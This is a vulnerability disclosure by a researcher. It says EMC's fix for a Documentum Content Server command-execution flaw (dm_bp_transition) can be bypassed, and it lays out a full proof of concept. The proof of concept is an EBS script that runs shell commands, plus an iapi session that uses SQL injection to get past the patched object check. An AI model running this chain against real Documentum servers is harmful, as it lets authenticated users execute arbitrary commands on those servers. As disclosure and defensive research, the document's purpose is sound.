EMC Documentum Content Server CVE-2014-2513 Bad Fix

`Product: EMC Documentum Content Server  
Vendor: EMC  
Version: ANY  
CVE: N/A  
Risk: High  
Status: public/not fixed  
  
On November 2013 I discovered vulnerability in EMC Documentum Content Server  
which allow authenticated user to execute arbitrary commands using  
dm_bp_transition docbase method (for detailed description see  
VRF#HUFPRMOP.txt).  
  
On July 2014 vendor announced ESA-2014-064 which was claiming that  
vulnerability has been remediated.  
  
On November 2014 fix was contested (there was significant delay after  
ESA-2014-064 because vendor constantly fails to provide status of reported  
vulnerabilities) by providing another proof of concept, description provided  
to CERT/CC (another CNA was chosen because vendor fails to communicate) was:  
  
=================================8<================================  
I have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following  
error:  
  
[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected  
error: [DM_API_W_NO_MATCH]warning: "There was no match in the  
docbase for the qualification: dm_procedure where r_object_id =  
'0801fd08805c9dfe'"  
  
Such behaviour means that EMC tried to remediate a security issue by  
“checking” object type of supplied object:  
  
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle  
Session id is s0  
API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'  
...  
[DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the  
qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"  
  
API> Bye  
  
bin]$ strings dmbasic| grep dm_procedure  
id,%s,dm_procedure where object_name = '%s' and folder('%s')  
id,%s,dm_procedure where r_object_id = '%s'  
# old version of dmbasic binary  
bin]$ strings dmbasic| grep dm_procedure  
bin]$  
  
So, the fix was implemented in dmbasic binary, the problem is neither 6.7  
SP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch  
that was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the  
issue is still reproducible because introduced check could be bypassed  
using SQL injection:  
  
~]$ cat test.ebs  
Public Function EntryCriteria(ByVal SessionId As String,_  
ByVal ObjectId As String,_  
ByVal UserName As String,_  
ByVal TargetState As String,_  
ByRef ErrorString As String) As Boolean  
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")  
EntryCriteria=True  
End Function  
~]$ cat /tmp/test  
cat: /tmp/test: No such file or directory  
  
~]$ iapi  
Please enter a docbase name (docubase): repo  
Please enter a user (dmadmin): test01  
Please enter password for test01:  
  
  
EMC Documentum iapi - Interactive API interface  
(c) Copyright EMC Corp., 1992 - 2011  
All rights reserved.  
Client Library Release 6.7.2190.0142  
  
  
Connecting to Server using docbase repo  
[DM_SESSION_I_SESSION_START]info: "Session 0101fd088014000c started for  
user test01."  
  
  
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle  
Session id is s0  
API> create,c,dm_sysobject  
...  
0801fd08805c9dfe  
API> set,c,l,object_name  
SET> test  
...  
OK  
API> setfile,c,l,test.ebs,crtext  
...  
OK  
API> save,c,l  
...  
OK  
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='  
repo repo dmadmin "" 0000000000000000 0000000000000000  
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id  
from dm_sysobject where r_object_id=''0801fd08805c9dfe"  
0000000000000000 0000000000000000 0000000000000000 ""  
0 0 T F T T dmadmin 0000000000000000'  
  
...  
  
(1 row affected)  
  
API> Bye  
~]$ cat /tmp/test  
dm_bp_transition_has_vulnerability  
~]$  
  
Here ‘union …’ allows to bypass check based on "id" call:  
  
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle  
Session id is s0  
API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union  
select r_object_id from dm_sysobject where  
r_object_id='0801fd08805c9dfe'  
...  
0801fd08805c9dfe  
API> apply,c,,GET_LAST_SQL  
...  
q0  
API> next,c,q0  
...  
OK  
API> get,c,q0,result  
...  
  
select all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where  
((dm_procedure.r_object_id='0801fd08805c9dfe,')) and  
(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)  
union select all dm_sysobject.r_object_id from dm_sysobject_sp  
dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))  
and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)  
  
API> close,c,q0  
...  
OK  
  
Comma is required to bypass error in fetch call:  
API> fetch,c,0801fd08805c9dfe' union select r_object_id from  
dm_sysobject where r_object_id='0801fd08805c9dfe  
...  
[DM_API_E_BADID]error: "Bad ID given: 0801fd08805c9dfe' union  
select r_object_id from dm_sysobject where r_object_id=  
'0801fd08805c9dfe"  
  
  
API> fetch,c,0801fd08805c9dfe,' union select r_object_id from  
dm_sysobject where r_object_id='0801fd08805c9dfe  
...  
OK  
=================================>8================================  
  
__  
Regards,  
Andrey B. Panfilov   
`